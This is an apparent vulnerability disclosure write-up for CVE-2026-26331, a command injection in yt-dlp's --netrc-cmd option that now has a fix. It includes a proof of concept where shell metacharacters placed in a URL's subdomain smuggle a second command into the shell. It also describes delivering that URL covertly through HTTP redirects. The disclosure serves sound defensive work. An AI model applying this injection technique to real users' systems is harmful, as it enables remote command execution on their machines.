← Achievements

CVE-2026-26331: yt-dlp Arbitrary Command Injection via --netrc-cmd

📅 2026-02-21 📂 Vulnerability Discovery
CVECommand Injectionyt-dlpPythonRCE
TL;DR:
Arbitrary command injection in yt-dlp's --netrc-cmd option allows an attacker to execute OS commands via a maliciously crafted URL, exploitable through HTTP redirects.

Summary

Discovered an arbitrary command injection vulnerability in yt-dlp, one of the most popular media downloaders. When the --netrc-cmd command-line option (or netrc_cmd Python API parameter) is used, an attacker can achieve arbitrary command injection on the user's system with a maliciously crafted URL.

CVE ID: CVE-2026-26331
Advisory: GHSA-g3gw-q23r-pgqm
CWE: CWE-78 — OS Command Injection
Fixed in: yt-dlp 2026.02.21

Vulnerability Details

yt-dlp's --netrc-cmd option runs an arbitrary shell command to retrieve site login credentials. The argument supports an optional placeholder ({}), which gets replaced with the netrc "machine" value — typically the site hostname.

Three extractors (GetCourseRuIE, TeachableIE, TeachableCourseIE) allow wildcard subdomain matches, meaning the netrc "machine" value is dynamically sourced from the hostname. Since --netrc-cmd is executed via subprocess.Popen with shell=True, special characters in the hostname are interpreted by the host shell.

Attack Vector

An attacker can craft a URL containing shell metacharacters in the subdomain. Even though the malicious URL itself looks suspicious, the attack can be delivered covertly — yt-dlp's "generic" extractor follows HTTP redirects, so an attacker can create a website with an innocent URL that redirects to the malicious one.

Proof of Concept

> yt-dlp --netrc-cmd "echo {}" "https://;echo pwned>&2;#.getcourse.ru/video"

[GetCourseRu] Executing command: echo getcourseru
WARNING: [GetCourseRu] Failed to parse .netrc: bad toplevel token 'getcourseru'
[GetCourseRu] Extracting URL: https://;echo pwned>&2;#.getcourse.ru/video
[GetCourseRu] Executing command: echo ;echo pwned>&2;
pwned
[GetCourseRu] No authenticators for ;echo pwned>&2;

The pwned output confirms arbitrary command execution through the crafted hostname.

Impact

  • Arbitrary command execution on any system using --netrc-cmd with the {} placeholder
  • Covert exploitation via HTTP redirects from legitimate-looking URLs
  • High impact for automated pipelines and scripts using yt-dlp with netrc authentication

Patch

Fixed in yt-dlp 2026.02.21 by validating all netrc "machine" values and raising an error upon unexpected input.

Fix commit: 1fbbe29

References